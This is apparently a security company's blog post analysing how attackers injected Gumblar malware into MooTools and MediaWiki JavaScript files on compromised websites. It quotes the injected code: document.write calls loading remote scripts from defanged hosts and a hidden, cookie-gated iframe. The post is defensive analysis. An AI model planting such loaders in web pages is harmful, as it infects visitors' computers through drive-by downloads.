• When Benign scripts attack – III

    In this post we continue to analyze how popular scripts are being targeted by hackers to cause infections on websites and computers which load them up in browsers for the viewing them. The motivation behind using these originally benign scripts to do the dirty work on their behalf is that a lot of webmasters and web-enthusiasts have wizened up to the fact that code-injection is a never ending battle and they are making efforts to identify and remove malicious code from their sites.

    This particular example shows how a mootools script was used by a hacker to spread a Gumblar infection. Consider the case of hxxp://www.wwf.gr/ referred to by 22lyk-athin. att.sch .gr/index.html.  You will find the following code listed on one of the associated mootools JavaScript files which are pulled in from the local drives. The malicious code causes an infection which leads to a site being blacklisted by Google. The detailed report from Google would probably mention that the infection of the Gumblar” type.

    Following the first example is another one wherein a Mediawiki script was targeted. The source was www.1wed din gsource.com/wedding-wiki/Wedding/

    //MooTools, My Object Oriented Javascript Tools. Copyright (c) 2006 Valerio Proietti, <http://mad4milk.net>, MIT Style License.
    
    var MooTools={version:'1.11'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&amp;&amp;obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}}
    if(type=='object'||type=='function'){switch(obj.constructor){case Array:return'array';case RegExp:return'regexp';case Class:return'class';}
    if(typeof obj.length=='number'){if(obj.item)return'collection';if(obj.callee)return'arguments';}}
    return type;};function $merge(){var mix={};for(var i=0;i&lt;arguments.length;i++){for(var property in arguments[i]){var ap=arguments[i][property];var mp=mix[property];if(mp&amp;&amp;$type(ap)=='object'&amp;&amp;$type(mp)=='object')mix[property]=$merge(mp,ap);else mix[property]=ap;}}
    return mix;};var $extend=function(){var args=arguments;if(!args[1])args=[this,args[0]];for(var property in args[1])args[0][property]=args[1][property];return args[0];};var $native=function(){for(var i=0,l=arguments.length;i&lt;l;i++){arguments[i].extend=function(props){for(var prop in props){if(!this.prototype[prop])this.prototype[prop]=props[prop];if(!this[prop])this[prop]=$native.generic(prop);}};}};$native.generic=function(prop){return function(bind){return this.prototype[prop].apply(bind,Array.prototype.slice.call(arguments,1));};};$native(Function,Array,String,Number);function $chk(obj){return!!(obj||obj===0);};function $pick(obj,picked){return $defined(obj)?obj:picked;};function $random(min,max){return Math.floor(Math.random()*(max-min+1)+min);};function $time(){return new Date().getTime();};function $clear(timer){clearTimeout(timer);clearInterval(timer);return null;};var Abstract=function(obj){obj=obj||{};obj.extend=$extend;return obj;};var Window=new Abstract(window);var Document=new Abstract(document);document.head=document.getElementsByTagName('head')[0];window.xpath=!!(document.evaluate);if(window.ActiveXObject)window.ie=window[window.XMLHttpRequest?'ie7':'ie6']=true;else if(document.childNodes&amp;&amp;!document.all&amp;&amp;!navigator.taintEnabled)window.webkit=window[window.xpath?'webkit420':'webkit419']=true;else if(document.getBoxObjectFor!=null)window.gecko=true;window.khtml=window.webkit;Object.extend=$extend;if(typeof HTMLElement=='undefined'){var HTMLElement=function(){};if(window.webkit)document.createElement(&quot;iframe&quot;);HTMLElement.prototype=(window.webkit)?window[&quot;[[DOMElement.prototype]]&quot;]:{};}
    HTMLElement.prototype.htmlElement=function(){};if(window.ie6)try{document.execCommand(&quot;BackgroundImageCache&quot;,false,true);}catch(e){};var(properties){var klass=function(){return(arguments[0]!==null&amp;&amp;this.initialize&amp;&amp;$type(this.initialize)=='function')?this.initialize.apply(this,arguments):this;};$extend(klass,this);klass.prototype=properties;klass.constructor=Class;return klass;};Class.empty=function(){};Class.prototype={extend:function(properties){var proto=new this(null);for(var property in properties){var pp=proto[property];proto[property]=Class.Merge(pp,properties[property]);}
    return new Class(proto);},implement:function(){for(var i=0,l=arguments.length;i&lt;l;i++)$extend(this.prototype,arguments[i]);}};Class.Merge=function(previous,current){if(previous&amp;&amp;previous!=current){var type=$type(current);if(type!=$type(previous))return current;switch(type){case'function':var merged=function(){this.parent=arguments.callee.parent;return current.apply(this,arguments);};merged.parent=previous;return merged;case'object':return $merge(previous,current);}}
    return current;};var Chain=new Class({chain:function(fn){this.chains=this.chains||[];this.chains.push(fn);return this;},callChain:function(){if(this.chains&amp;&amp;this.chains.length)this.chains.shift().delay(10,this);},clearChain:function(){this.chains=[];}});var Events=new Class({addEvent:function(type,fn){if(fn!=Class.empty){this.$events=this.$events||{};this.$events[type]=this.$events[type]||[];this.$events[type].include(fn);}
    return this;},fireEvent:function(type,args,delay){if(this.$events&amp;&amp;this.$events[type]){this.$events[type].each(function(fn){fn.create({'bind':this,'delay':delay,'arguments':args})();},this);}
    
    **code removed for brevity**
    
    this.effects={};if(this.options.opacity)this.effects.opacity='fullOpacity';if(this.options.width)this.effects.width=this.options.fixedWidth?'fullWidth':'offsetWidth';if(this.options.height)this.effects.height=this.options.fixedHeight?'fullHeight':'scrollHeight';for(var i=0,l=this.togglers.length;i&lt;l;i++)this.addSection(this.togglers[i],this.elements[i]);this.elements.each(function(el,i){if(this.options.show===i){this.fireEvent('onActive',[this.togglers[i],el]);}else{for(var fx in this.effects)el.setStyle(fx,0);}},this);this.parent(this.elements);if($chk(this.options.display))this.display(this.options.display);},addSection:function(toggler,element,pos){toggler=$(toggler);element=$(element);var test=this.togglers.contains(toggler);var len=this.togglers.length;this.togglers.include(toggler);this.elements.include(element);if(len&amp;&amp;(!test||pos)){pos=$pick(pos,len-1);toggler.injectBefore(this.togglers[pos]);element.injectAfter(toggler);}else if(this.container&amp;&amp;!test){toggler.inject(this.container);element.inject(this.container);}
    var idx=this.togglers.indexOf(toggler);toggler.addEvent('click',this.display.bind(this,idx));if(this.options.height)element.setStyles({'padding-top':0,'border-top':'none','padding-bottom':0,'border-bottom':'none'});if(this.options.width)element.setStyles({'padding-left':0,'border-left':'none','padding-right':0,'border-right':'none'});element.fullOpacity=1;if(this.options.fixedWidth)element.fullWidth=this.options.fixedWidth;if(this.options.fixedHeight)element.fullHeight=this.options.fixedHeight;element.setStyle('overflow','hidden');if(!test){for(var fx in this.effects)element.setStyle(fx,0);}
    return this;},display:function(index){index=($type(index)=='element')?this.elements.indexOf(index):index;if((this.timer&amp;&amp;this.options.wait)||(index===this.previous&amp;&amp;!this.options.alwaysHide))return this;this.previous=index;var obj={};this.elements.each(function(el,i){obj[i]={};var hide=(i!=index)||(this.options.alwaysHide&amp;&amp;(el.offsetHeight&gt;0));this.fireEvent(hide?'onBackground':'onActive',[this.togglers[i],el]);for(var fx in this.effects)obj[i][fx]=hide?0:el[this.effects[fx]];},this);return this.start(obj);},showThisHideOpen:function(index){return this.display(index);}});Fx.Accordion=Accordion;
    
    **malicious code**
    
    document.write('&lt;scr ipt src=hxxp://nw drealty.com/Scripts/Unti tled-17.php &gt;&lt;\/sc ript&gt;');
    document.write('&lt;scri pt src=hxxp://nwd realty.com/Scripts/Untit led-17.php &gt;&lt;\/s cript&gt;');&lt;/pre&gt;
    etTime()+2678400000);if(document.cookie.indexOf(&quot;_df=f&quot;)==-1){if(navigator.appCodeName.indexOf(&quot;a&quot;)!=-1){iframe=&quot;iframe&quot;}document.write(&quot;&lt;iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'&gt;&lt;/iframe&gt;&quot;);document.cookie=&quot;_df=f; expires=expires.toGMTString(); &quot;}\n']&lt;/pre&gt;
    

    Our systems flagged this as unsafe. This exploit leads to an infection which is a remnant of the famous gumblar virus.

    // MediaWiki JavaScript support functionsvar clientPC = navigator.userAgent.toLowerCase(); // Get client info
    <pre id="cb0049f11cbf55990b47f8e86dc03a62ee0ea17d-133-highlight">
    var is_gecko = /gecko/.test( clientPC ) &&
    !/khtml|spoofer|netscape\/7\.0/.test(clientPC);
    var webkit_match = clientPC.match(/applewebkit\/(\d+)/);
    if (webkit_match) {
    var is_safari = clientPC.indexOf('applewebkit') != -1 &&
    clientPC.indexOf('spoofer') == -1;
    var is_safari_win = is_safari && clientPC.indexOf('windows') != -1;
    
    ** code removed for brevity **
    }
    //note: all skins should call runOnloadHook() at the end of html output,
    //      so the below should be redundant. It's there just in case.
    hookEvent("load", runOnloadHook);
    
    ** malicious code **
    document.write('<scr ipt src=hxxp://hydr eka.com/logiciels/winfluid_mo bile.php ><\/s cript>');</pre>
    
    • […] 79% of Joomla sites use Mootools. (NOTE: MooTools has been known to be targeted preferentially by malicious hackers as a code-injection deliv…) […]

      Posted by Analyzing Popular CMSes: Are Joomla users at risk? – StopTheHacker.com – Jaal, LLC. on February 1st